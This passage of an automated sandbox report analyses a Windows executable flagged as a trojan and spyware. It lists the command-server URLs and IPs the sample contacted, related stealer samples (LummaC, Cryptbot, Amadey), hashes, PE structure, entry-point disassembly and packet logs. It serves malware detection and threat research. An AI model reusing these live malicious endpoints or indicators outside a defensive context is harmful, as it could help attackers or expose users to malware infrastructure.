                          http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850http://home.twentytk20ht.top/TQIuuaqjNpwY5Jat5RkD3a.exe, 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmpfalse
                            		unknown
                            http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850::35Jat5RkD3a.exe, 00000000.00000002.1560049226.000000000176A000.00000004.00000020.00020000.00000000.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1538377629.0000000001766000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://curl.se/docs/http-cookies.html#5Jat5RkD3a.exefalse
                                		high
                                https://curl.se/docs/alt-svc.html5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                  		high
                                  http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFoj8505Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://.css5Jat5RkD3a.exe, 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                      		high
                                      http://.jpg5Jat5RkD3a.exe, 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                        		high

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        185.121.15.192
                                        		home.twentytk20ht.topSpain
                                        		207046REDSERVICIOESfalse
                                        34.226.108.155
                                        		httpbin.orgUnited States
                                        		14618AMAZON-AESUSfalse

                                        General Information

                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1578893
                                        Start date and time:2024-12-20 16:18:39 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 5m 9s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:5
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:5Jat5RkD3a.exe
                                        renamed because original name is a hash value
                                        Original Sample Name:8c39c06251f42e3b7ebc710fe06753aa.exe
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@1/0@6/2
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:Failed
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Stop behavior analysis, all processes terminated

                                        Warnings

                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                        • Excluded IPs from analysis (whitelisted): 20.12.23.50
                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        10:19:55API Interceptor3x Sleep call for process: 5Jat5RkD3a.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        185.121.15.192u57m8aCdwb.exeGet hashmaliciousUnknownBrowse
                                        • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                                        TnIhoWAr57.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                        • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                        • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851?argument=TmUWwkAQBKXXTWTE1734696758
                                        34.226.108.155file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                          file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                            file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, LummaC StealerBrowse
                                              s3hvuz3XS0.exeGet hashmaliciousCryptbotBrowse
                                                65AcuGF7W7.exeGet hashmaliciousCryptbotBrowse
                                                  UYJ0oreVew.exeGet hashmaliciousUnknownBrowse
                                                    NWKk493xTy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                      88S3zQTYpl.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            httpbin.orgu57m8aCdwb.exeGet hashmaliciousUnknownBrowse
                                                            • 98.85.100.80
                                                            TnIhoWAr57.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                            • 98.85.100.80
                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                            • 34.226.108.155
                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                            • 98.85.100.80
                                                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                            • 34.226.108.155
                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                            • 98.85.100.80
                                                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                            • 34.226.108.155
                                                            file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, LummaC StealerBrowse
                                                            • 34.226.108.155
                                                            file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                            • 98.85.100.80
                                                            Tii6ue74NB.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, VidarBrowse
                                                            • 98.85.100.80
                                                            home.twentytk20ht.topu57m8aCdwb.exeGet hashmaliciousUnknownBrowse
                                                            • 185.121.15.192
                                                            TnIhoWAr57.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                            • 185.121.15.192

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            REDSERVICIOESu57m8aCdwb.exeGet hashmaliciousUnknownBrowse
                                                            • 185.121.15.192
                                                            TnIhoWAr57.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                            • 185.121.15.192
                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                            • 185.121.15.192
                                                            http://blacksaltys.comGet hashmaliciousUnknownBrowse
                                                            • 185.121.15.137
                                                            IGz.arm7.elfGet hashmaliciousMiraiBrowse
                                                            • 185.189.98.142
                                                            https://agradeahead.com/Get hashmaliciousUnknownBrowse
                                                            • 185.121.15.137
                                                            http://productfocus.comGet hashmaliciousUnknownBrowse
                                                            • 185.121.15.137
                                                            https://objmapper.com/CtmE0s2ZteC8BuQLNprxjCPB8gAgAcIi7niu-9oX3Q2eGet hashmaliciousUnknownBrowse
                                                            • 185.121.15.137
                                                            hax.mips.elfGet hashmaliciousMiraiBrowse
                                                            • 185.226.106.144
                                                            la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                            • 178.19.44.184
                                                            AMAZON-AESUShttps://postoffice.adobe.com/po-server/link/redirect?target=eyJhbGciOiJIUzUxMiJ9.eyJ0ZW1wbGF0ZSI6ImNjX2NvbGxhYl9kY3NoYXJpbmdfdmlld19lbWFpbCIsImVtYWlsQWRkcmVzcyI6ImJyaWFuLmh1dGNoaW5zQHJpdmVycm9jay5jb20iLCJyZXF1ZXN0SWQiOiJhYzIxMDNjZS03NDZkLTRmMTctNjBkYi00MzM5OWU3NzU5NGEiLCJsaW5rIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9pZC91cm46YWFpZDpzYzpWQTZDMjplOTgwMjRmZi03NGRmLTRlNjctYjJkZi0wNWY0NTk4MTc4OWUiLCJsYWJlbCI6IjExIiwibG9jYWxlIjoicHRfQlIifQ.GzFDC4sqpVLEAHwIPLSleF4_d0iUGb4--dg-spPTHWsUGjt086-aN6bs1cEm-BfvTqQu97RqT5NU-RFwvTkvTAGet hashmaliciousUnknownBrowse
                                                            • 3.236.206.93
                                                            arm5.elfGet hashmaliciousMiraiBrowse
                                                            • 54.7.169.53
                                                            arm7.elfGet hashmaliciousMiraiBrowse
                                                            • 18.214.183.17
                                                            nsharm.elfGet hashmaliciousMiraiBrowse
                                                            • 15.177.209.179
                                                            tmp.zipGet hashmaliciousUnknownBrowse
                                                            • 52.0.145.89
                                                            https://alphaarchitect.com/2024/12/long-term-expected-returns/Get hashmaliciousUnknownBrowse
                                                            • 3.225.89.177
                                                            http://url4908.dhlecommerce.co.uk/ls/click?upn=u001.X2rfUT-2B51P1nILh8ZMtd4zxSiOlaeCaJtVhZupM-2F9LVEom-2B2QjKW7VcxuhsgKUeKnIPI_ewjtI2P4e42WCeQ3lgulQYJHXxC-2BKEQd0RqJfZdimIQiEcg5K71uNDU3wpKab4YU06GJXEZw9euxGD1hXreQRtHviPlL-2BsigHUpj3RYaHOJ-2FpfiIYtW5UZW-2FL-2BsfGEF-2Fu3A-2Bkin-2FRABSBeyYYIziUnz7H5jv9BuAlxlqnrkK7Xb-2BSSeTcIF0qb4hFEFWpSrypfKJHyCgl3tbBDsclBEPKsRVdEpjy6Dwgd1VZBghtqeTmGJ311VYG2rlnLwf52rNmVt0FUWd8IYzZVJADPK4JWoWP-2FevdRAolnQn3jiyaPa-2FoGFukWqUg1oi4mOa5JSgRM9klq2vHbg6hrhBgclPYZMSvATsKsPKxozGI6BjIj7xrP4YD2dZONVrYcGI5H8pGet hashmaliciousHTMLPhisherBrowse
                                                            • 52.21.33.16
                                                            https://click.pstmrk.it/3s/veed.io%2Fshare-video-link%3Ftoken%3DeyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MzQ2MzE2NDgsImlhdCI6MTczNDYzMDc0OCwic3ViIjoiZmY0NTdiM2MtYjI3MC00YzA0LWEwOTEtYjY3ZDJkOGQ3ZTU1Iiwicm9sZXMiOltdLCJraWQiOiJwcm9qZWN0cy92ZWVkLXByb2Qtc2VydmVyL2xvY2F0aW9ucy9ldXJvcGUtd2VzdDEva2V5UmluZ3MvdmVlZC1wcm9kLWtleXJpbmcvY3J5cHRvS2V5cy92ZWVkLXByb2QtandrLWtleS9jcnlwdG9LZXlWZXJzaW9ucy8xIiwiZmVhdHVyZXMiOnt9LCJzY29wZXMiOltdfQ.f-EtSCYYeQiR4cEb8w5ABF3koXpbxl8QeFIarADkLP6q32DzsnFZl76Y98Uad7M8RBPPuOQOV9SUbCY1hRa4IbqV9_4cTm0v7DuBTCKOZbHN1NiATZOGw2BzdEMqIEfnNo5A_H2_DLVQZLtd6sZzcRoNBzbmcq2_xlzWgmqIErGV0VYXIb-Vac1b-3wmAgIyE-VS7Cd5aHYtVyiV9T5HfrpjPl7-M6dLIaQqm6103z7gO_qoKow1qbFmNgGaUsQED1CHbqo-hCgXzib7NToyu0Qq4kSl-2NEzgLMKy1zFR2J0E0vr9FHirjR9fmmDF2nk76Ht8L2WbV-dRyXZBZaUikfojo56vYWI9cfSQrG_awuFNR0M1s6dpPwumDM8sXlMZYt4u5WZaNcRZynPHXeqNZcdwKhlZrFN0U3B3U7B69avz_FlMxw6Or_0aeJkUP5YZP3wH-IIbwwa6es37u8G7gWYINEfp-pJlKV7klV1CcskLf_53iNx7MtxgvAXLMNZJ2tnuxY8W6w_E-pchjpNP2I5NV2Ui2_bNSgl3kBuX3oWsX0m_wL3MZ39pE3paPp2FAIgQPpZ5a0BhmPYsMk2IPPel2dll8j1IYBwHsZ5a1IHsHA6gTMWkJl-uhAjN4mnXo7Om0NWRZvfFvatgA4YCoTXdntM31GIZxAyWF9a14%26postLoginUrl%3D%252Fview%252F3ab9b7be-178c-4289-b29e-75921856f7f5%252F/oMlP/0SC6AQ/AQ/15f5e010-d260-490a-9e5d-79f5643b5481/1/HSOO9aL291Get hashmaliciousUnknownBrowse
                                                            • 107.22.100.5
                                                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                            • 34.226.108.155
                                                            https://f.io/nWWUxvn6Get hashmaliciousHTMLPhisherBrowse
                                                            • 52.45.152.88

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            No created / dropped files found

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                            Entropy (8bit):7.981576271910101
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • VXD Driver (31/22) 0.00%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:5Jat5RkD3a.exe
                                                            File size:4'449'280 bytes
                                                            MD5:8c39c06251f42e3b7ebc710fe06753aa
                                                            SHA1:cee1dc7963d47a34b22683f42fcd125478a0d586
                                                            SHA256:68d042b3b794b314a80918bf399bafbace6cff82e4d567f9b42f3699d3c44c35
                                                            SHA512:a6fdd8cd2065232c558f6fb4abb5c5a6ed7f99e6c355e58de94e5876d6ea59ad3784bec3c944e1de426189c529b8dfefa675e4c755134f4b6086ea33b71b2312
                                                            SSDEEP:98304:l5J8nX6y3j1Hf3xUCcKXsW+Dl4UZ8RBx3YO87I:l56nXBH/iC3XdPUoBxOM
                                                            TLSH:212633F0B2ABC15CDF2DF9F1289199DE52140F236953E26AD9CA221B59D3D8447CCEE0
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....cg...............(.JI..Lu..2...........`I...@...................................D...@... ............................

                                                            File Icon

                                                            Icon Hash:90cececece8e8eb0

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x106e000
                                                            Entrypoint Section:.taggant
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                            DLL Characteristics:DYNAMIC_BASE
                                                            Time Stamp:0x67639807 [Thu Dec 19 03:50:31 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                            Entrypoint Preview

                                                            Instruction
                                                            jmp 00007FD935286FEAh
                                                            cmpps xmm0, dqword ptr [ebx+00h], 00h
                                                            add byte ptr [eax], al
                                                            add cl, ch
                                                            add byte ptr [eax], ah
                                                            add byte ptr [eax], al
                                                            add byte ptr [edx], al
                                                            or al, byte ptr [eax]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], dh
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [edx], al
                                                            or al, byte ptr [eax]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [ecx], al
                                                            add byte ptr [eax], 00000000h
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            adc byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add dword ptr [edx], ecx
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x72b05f0x73.idata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x72a0000x2b0.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xc6be980x10pvfmcbmp
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0xc6be480x18pvfmcbmp
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            0x10000x7290000x2834002a0c12bc3b794f01cad3c230b9c20449unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0x72a0000x2b00x20084d5b3f17573b257ccdb2a7a3535bef1False0.798828125data6.018377851508956IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .idata 0x72b0000x10000x200d6de82d14e357527731a70b0d9d5c0e8False0.166015625data1.1589685166080708IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            0x72c0000x3890000x2001d1338127d3df5ec4574238b3e2c7ce0unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            pvfmcbmp0xab50000x1b80000x1b72006ab7c2693d139608c976872aeda87c25False0.9944063789851978data7.95605426603415IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            qfezismy0xc6d0000x10000x60053cbe08bb58be802a6bbd8993d650974False0.6067708333333334data5.288407157046807IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .taggant0xc6e0000x30000x2200a76bfe367d1e8a756437255896161c9dFalse0.06571691176470588DOS executable (COM)0.7663504896487867IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_MANIFEST0xc6bea80x256ASCII text, with CRLF line terminators0.5100334448160535

                                                            Imports

                                                            DLLImport
                                                            kernel32.dlllstrcpy

                                                            Network Behavior

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 20, 2024 16:19:51.995580912 CET49701443192.168.2.1034.226.108.155
                                                            Dec 20, 2024 16:19:51.995651007 CET4434970134.226.108.155192.168.2.10
                                                            Dec 20, 2024 16:19:51.995728970 CET49701443192.168.2.1034.226.108.155
                                                            Dec 20, 2024 16:19:52.012610912 CET49701443192.168.2.1034.226.108.155
                                                            Dec 20, 2024 16:19:52.012645960 CET4434970134.226.108.155192.168.2.10
                                                            Dec 20, 2024 16:19:53.751523018 CET4434970134.226.108.155192.168.2.10
                                                            Dec 20, 2024 16:19:53.761790991 CET49701443192.168.2.1034.226.108.155
                                                            Dec 20, 2024 16:19:53.761831999 CET4434970134.226.108.155192.168.2.10
                                                            Dec 20, 2024 16:19:53.763474941 CET4434970134.226.108.155192.168.2.10
                                                            Dec 20, 2024 16:19:53.763572931 CET49701443192.168.2.1034.226.108.155
                                                            Dec 20, 2024 16:19:53.793211937 CET49701443192.168.2.1034.226.108.155
                                                            Dec 20, 2024 16:19:53.793344021 CET4434970134.226.108.155192.168.2.10
                                                            Dec 20, 2024 16:19:53.793420076 CET49701443192.168.2.1034.226.108.155
                                                            Dec 20, 2024 16:19:53.793431044 CET4434970134.226.108.155192.168.2.10
                                                            Dec 20, 2024 16:19:53.844302893 CET49701443192.168.2.1034.226.108.155
                                                            Dec 20, 2024 16:19:54.113707066 CET4434970134.226.108.155192.168.2.10
                                                            Dec 20, 2024 16:19:54.113837957 CET4434970134.226.108.155192.168.2.10
                                                            Dec 20, 2024 16:19:54.113905907 CET49701443192.168.2.1034.226.108.155
                                                            Dec 20, 2024 16:19:54.164314985 CET49701443192.168.2.1034.226.108.155
                                                            Dec 20, 2024 16:19:54.164364100 CET4434970134.226.108.155192.168.2.10
                                                            Dec 20, 2024 16:19:55.325848103 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:55.445430994 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:55.445549965 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:55.446743965 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:55.566489935 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:55.566534996 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:55.566626072 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:55.566643000 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:55.566690922 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:55.566699028 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:55.566728115 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:55.566740036 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:55.566755056 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:55.566804886 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:55.566842079 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:55.566854954 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:55.566867113 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:55.566926003 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:55.567099094 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:55.572357893 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:55.686333895 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:55.686358929 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:55.686415911 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:55.686449051 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:55.686475039 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:55.686491013 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:55.686542988 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:55.686711073 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:55.686842918 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:55.686896086 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:55.688199043 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:55.690623999 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:55.733843088 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:55.734713078 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:55.850024939 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:55.852417946 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:55.905950069 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:55.906181097 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.014086962 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.014156103 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.118005991 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.118113041 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.237786055 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.237898111 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.431937933 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.432157993 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.432243109 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.551820040 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.551924944 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.551948071 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.551958084 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.551969051 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.552004099 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.552038908 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.552057981 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.552067995 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.552114964 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.552251101 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.552261114 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.552309990 CET4970280192.168.2.10185.121.15.192
                                                            Dec 20, 2024 16:19:56.552520990 CET8049702185.121.15.192192.168.2.10
                                                            Dec 20, 2024 16:19:56.552531958 CET8049702185.121.15.192192.168.2.10
